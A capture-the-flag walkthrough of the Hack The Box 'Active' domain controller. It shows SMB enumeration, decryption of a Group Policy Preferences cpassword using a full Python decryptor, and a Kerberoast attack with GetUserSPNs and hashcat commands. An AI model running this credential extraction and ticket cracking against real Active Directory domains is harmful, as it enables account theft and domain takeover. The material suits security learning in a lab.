
# Active

**Date**: 27/06/2022

**Difficulty**: Easy

**CTF**: <https://app.hackthebox.com/machines/148>

***

Let’s start with the classic ping to test the connection with the target machine:

<figure><img src="/files/j55badR6zogQmu7r0ADE" alt=""><figcaption></figcaption></figure>

1 packet transmitted, 1 packet received. The TTL is 127: Windows replies with a default TTL of 128, and the value drops by one for each hop (here the HTB VPN gateway), so we are probably up against a Windows machine.

Let’s do a scan of the TCP ports to find which ones are open:

<figure><img src="/files/aNknkV3uqmkj7ytB4clZ" alt=""><figcaption></figcaption></figure>

It shows a bunch of open TCP ports. Let's run a service and version scan against just those ports:

<figure><img src="/files/IvZarUJSgvc9E66L6rqU" alt=""><figcaption></figcaption></figure>

There is a lot of information here. First of all, Kerberos (88), RPC and LDAP are exposed together, which is the signature of an Active Directory domain controller. We also have a DNS service on port 53 and an HTTP service running on port 47001.

Let's see if we can get any info from the DNS service (zone transfer, hostname records):

<figure><img src="/files/owUodxNIoyQpwgz6mZNW" alt=""><figcaption></figcaption></figure>

Apparently nothing. Let's look at the HTTP service:

<figure><img src="/files/MulFA4Z0JBPNP4eUu3xM" alt=""><figcaption></figcaption></figure>

Port 445 (SMB) is also open. Let's try to obtain more info using crackmapexec:

<figure><img src="/files/tg1XaiNkWjSZa8M5XGce" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/S1gh2rbRY790HiOq7pdK" alt=""><figcaption></figcaption></figure>

Searching for the build number shows that the target is Windows Server 2008 R2 SP1.

Now that we know the domain is `active.htb`, let's add it to `/etc/hosts`.

<figure><img src="/files/arcq0pl4RD5GKzSixVeX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ViLkLunLhC0Szx4GBcsc" alt=""><figcaption></figcaption></figure>

The HTTP service looks the same when requested by hostname, though.

Let's enumerate the SMB shares and our permissions on each of them:

<figure><img src="/files/7MrOTd02TEmnGaPZSQEe" alt=""><figcaption></figcaption></figure>

We have READ permission on the `Replication` share. Let's look inside!

<figure><img src="/files/SEdPzPpeU2gwsEbl4Tgm" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/qObR9hF7HZ2idaN4rdTh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9D41BjryufyE29vLSZV4" alt=""><figcaption></figcaption></figure>

Every folder at this level was empty.

<figure><img src="/files/PmcKJ6LDZE8Q1kWsTXGF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/IRKnHuEAPFZatGRt123o" alt=""><figcaption></figcaption></figure>

It looks like there may be interesting files in there, so let's download the whole share to navigate it locally:

`smbget -R smb://10.129.81.48/Replication`

<figure><img src="/files/8fiyEwDcxnz2iKDBxVCP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/x2EeyuyLbUZ8sIQUWYEr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tRgb5CS7HHHK2IrVCGIz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XTPZ66mgoOPZDrHzvPsP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/D1CVpeWvezCMJdBAW6v5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VG9mSyMimFpV7VHI5641" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/YNOJMBUI4wqlVaScBXlK" alt=""><figcaption></figcaption></figure>

Maybe we have credentials here?

`active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ`

<figure><img src="/files/RceZ5RLo4UjDlWajPEeD" alt=""><figcaption></figcaption></figure>

It's not that simple: the string is not the plaintext password. Let's at least check whether the username is valid using kerbrute:

<figure><img src="/files/qiI9nhZgNhyElp1O9tll" alt=""><figcaption></figcaption></figure>

Yes, it is. So we have a valid username but not (yet) its password.

Doing some research, I found [this](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/):

<figure><img src="/files/SJxIcC4dyf9z6dEWUInE" alt=""><figcaption></figcaption></figure>

So the value is a Group Policy Preferences `cpassword`. It is AES-256 encrypted, but Microsoft published the 32-byte key in its own MS-GPPREF documentation, so anyone who can read the XML file can decrypt it with gpp-decrypt; no cracking is involved. MS14-025 (2014) stopped Windows from writing new `cpassword` values, but it did not remove the ones already stored in SYSVOL, which is why they still turn up in Group Policy folders like this one.

<figure><img src="/files/k0WmsE5zaHGzQtTetWMa" alt=""><figcaption></figcaption></figure>
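To make the "decrypt, don't crack" point concrete, here is what gpp-decrypt does, written out in Python. This is an added example, not the page's commands or gpp-decrypt's own code. The AES key is the one from Microsoft's MS-GPPREF specification; the IV is all zeros and the plaintext is UTF-16LE with PKCS#7 padding. It goes a little beyond the page: it walks any GPP XML file (`Groups.xml`, but also `ScheduledTasks.xml`, `Services.xml`, `Drives.xml` and `DataSources.xml`, which can carry a `cpassword` too) and pairs each value with the account attribute that file type uses. The sample `Groups.xml` is constructed around the `cpassword` and `userName` shown above; the other attributes in it are assumptions. It uses the `cryptography` or `pycryptodome` library if one is installed and otherwise falls back to the `openssl` CLI.

```python
import base64
import subprocess
import xml.etree.ElementTree as ET
from typing import List, Tuple

# 32-byte AES key Microsoft published in MS-GPPREF ("Password Encryption").
# It is identical in every domain, which is why cpassword is effectively plaintext.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)  # the specification uses an all-zero IV

# Attribute naming the account a cpassword belongs to, by GPP file type:
# Groups.xml / Drives.xml / DataSources.xml use userName,
# ScheduledTasks.xml uses runAs, Services.xml uses accountName.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

# Constructed sample: the cpassword and userName are the ones found on the
# Replication share above; the surrounding element/attribute layout is assumed.
SAMPLE_GROUPS_XML = r"""<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" neverExpires="1" userName="active.htb\SVC_TGS"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
</Groups>"""


def _aes256_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-256-CBC decryption (no unpadding) with whichever backend exists."""
    try:
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        pass
    try:
        from Crypto.Cipher import AES  # pycryptodome
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        pass
    # Last resort: the openssl CLI. -nopad so that we verify PKCS#7 ourselves.
    return subprocess.run(
        ["openssl", "enc", "-d", "-aes-256-cbc", "-nopad", "-K", key.hex(), "-iv", iv.hex()],
        input=data, capture_output=True, check=True,
    ).stdout


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a GPP cpassword attribute value back into the plaintext password."""
    # GPP strips the trailing '=' from the base64 text; put it back before decoding.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    plain = _aes256_cbc_decrypt(GPP_AES_KEY, GPP_IV, ciphertext)
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a cpassword or corrupted data")
    # Windows stores the password as UTF-16LE
    return plain[:-pad].decode("utf-16-le")


def find_gpp_credentials(xml_text: str) -> List[Tuple[str, str]]:
    """Walk any GPP XML document and return (account, plaintext) for each cpassword."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        cpass = elem.get("cpassword")
        if not cpass:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
        found.append((account, decrypt_cpassword(cpass)))
    return found


if __name__ == "__main__":
    for account, password in find_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account}:{password}")
```

Point it at every `*.xml` under `Policies/` on a SYSVOL or Replication copy and it prints `account:password` pairs ready for crackmapexec; the padding check is what tells a real `cpassword` apart from some other base64 attribute.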

Let’s save this credential in a file.

<figure><img src="/files/F4lwvannUy7os85j6zMP" alt=""><figcaption></figcaption></figure>

And now let’s test it:

<figure><img src="/files/ZKV4Hglbpre4nLIKoCC3" alt=""><figcaption></figcaption></figure>

Yes, it’s valid!

<figure><img src="/files/u6mAwRBpYiCB5SzEE8mV" alt=""><figcaption></figcaption></figure>

Now, using these credentials, we have access to more shares. Let's look into `Users`:

<figure><img src="/files/pCgABwGUBivfKRd0ChI2" alt=""><figcaption></figcaption></figure>

Can we list the Administrator folder?

<figure><img src="/files/AEl206iOJybLwH6EfhIl" alt=""><figcaption></figcaption></figure>

Nope. Let’s try with the rest:

<figure><img src="/files/LcGo6bz4BlSPsEDcXk01" alt=""><figcaption></figcaption></figure>

The user flag is in `Users/SVC_TGS/Desktop`. Let's download it!

<figure><img src="/files/XUToh4R5HZl2ntwsnLHJ" alt=""><figcaption></figcaption></figure>

After enumerating SMB I found nothing else interesting, so let's dump the directory over LDAP with `ldapdomaindump`, using the SVC_TGS credentials:

<figure><img src="/files/CbdUGoFaii7XxARVtY4y" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/krv9iJQFneSXC6g1PH5s" alt=""><figcaption></figcaption></figure>

As we saw earlier it is a Windows Server 2008 R2 SP1.

<figure><img src="/files/6pp7ZgaWxPz9enb12tVP" alt=""><figcaption></figcaption></figure>

Apparently there are only 4 users:

* SVC\_TGS: we have its credentials
* krbtgt: Key Distribution Center Service Account
* Guest
* Administrator

Let's try a Kerberoast attack: any authenticated domain user can request a service ticket for any account that has an SPN, and part of that ticket is encrypted with the service account's password hash, so it can be cracked offline:

`❯ sudo python3 /home/angellm/THM/CTF/Relevant/impacket/build/scripts-3.9/GetUserSPNs.py active.htb/SVC_TGS:GP#################18 -dc-ip 10.129.104.47 -request`

<figure><img src="/files/ycxPKdaQnAEurWXUS46y" alt=""><figcaption></figcaption></figure>

Let's now try to crack the ticket using hashcat (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC tickets, which is what the `$krb5tgs$23$` prefix indicates):

`hashcat -m 13100 -a 0 kerberoast_result /usr/share/wordlists/rockyou.txt`

<figure><img src="/files/FTcFU09rgYZCoCYjk06E" alt=""><figcaption></figcaption></figure>

Cracked!

Let's check whether these credentials are valid:

<figure><img src="/files/GIjCKaA6fUCFs7VpG6U5" alt=""><figcaption></figcaption></figure>

Pwned! Let's go for the root flag:

<figure><img src="/files/tuaJJieakoY61YSgDIdj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/uzy3STnlwVA9nNmea8Tv" alt=""><figcaption></figcaption></figure>

Done!

